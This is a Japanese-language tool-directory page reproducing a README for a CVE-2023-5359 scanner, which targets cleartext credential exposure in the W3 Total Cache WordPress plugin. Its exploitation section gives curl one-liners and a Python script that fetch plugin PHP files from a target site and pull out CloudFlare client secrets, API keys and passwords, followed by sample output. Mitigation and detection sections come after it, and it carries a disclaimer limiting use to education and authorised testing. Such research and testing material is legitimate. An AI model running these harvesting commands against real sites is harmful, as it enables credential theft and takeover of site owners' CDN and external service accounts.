Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-5359 — CVE-2023-5359 - W3 Total Cache クリアテキスト保存の脆弱性スキャナー。W3 Total Cache プラグイン バージョン ≤ 2.7.5 の露出した認証情報を検出します。 | Kitploit
ツール/GitHubGitHub/enzocipher/cve-2023-5359
脆弱性スキャナーパスワード攻撃エクスプロイト情報収集ウェブセキュリティ学習と教育
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

CVE-2023-5359 - W3 Total Cache クリアテキスト保存の脆弱性スキャナー。W3 Total Cache プラグイン バージョン ≤ 2.7.5 の露出した認証情報を検出します。

リポジトリを見る
9ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-5359 - W3 Total Cache 平文保存の脆弱性

説明

CVE-2023-5359 は、WordPress プラグイン W3 Total Cache のバージョン ≤ 2.7.5 に影響する平文保存の脆弱性です。この脆弱性により、リモートの攻撃者は、公開されている暗号化されていない PHP ファイルに保存された機密の認証情報にアクセスできます。

深刻度

  • CVSS スコア: 7.5 (高)
  • ベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • タイプ: 機密情報の露出

技術的な脆弱性

根本原因

W3 Total Cache は、設定と API 認証情報を /wp-content/plugins/w3-total-cache/ ディレクトリ内の PHP ファイルに十分な保護なしで保存します。これらのファイルは HTTP 経由でアクセス可能であり、以下を露出させます:

  • API キー(CloudFlare、Google など)
  • クライアントシークレット
  • OAuth トークン
  • 外部サービスの認証情報

影響を受けるファイル

root@kitploit:~
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

悪用方法

手動による方法

root@kitploit:~
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

自動化スクリプト

root@kitploit:~
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

影響

攻撃者は以下を取得できる可能性があります:

  1. CloudFlare 認証情報 - CDN と DNS の制御を取得
  2. 外部サービスの API キー - 外部アカウントへのアクセス
  3. OAuth トークン - なりすまし
  4. キャッシュ設定 - 配信されるコンテンツの操作

緩和策

緊急対策

  1. 更新:W3 Total Cache ≥ 2.7.6 へ更新する
  2. アクセス制限:プラグインディレクトリ内の PHP ファイルへのアクセスを制限する
  3. 失効と再発行:露出したすべての認証情報を失効させ再発行する

安全な設定

root@kitploit:~
# .htaccess protection
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

検出

検証コマンド

root@kitploit:~
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

侵害の兆候

  • 外部 API での異常なアクティビティ
  • CloudFlare 設定の変更
  • 接続されたサービスへの許可されていない IP からのトラフィック

検出例

root@kitploit:~
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

参考情報

  • CVE-2023-5359
  • W3 Total Cache チェンジログ
  • WordPress セキュリティチーム

法的通知

このリポジトリは教育目的および許可されたペネトレーションテスト専用です。この情報の悪意のある使用は固く禁止されています。


この情報が役に立ちましたか? リポジトリにスターを付けてください!

最終更新: 2025年11月

ツールをダウンロード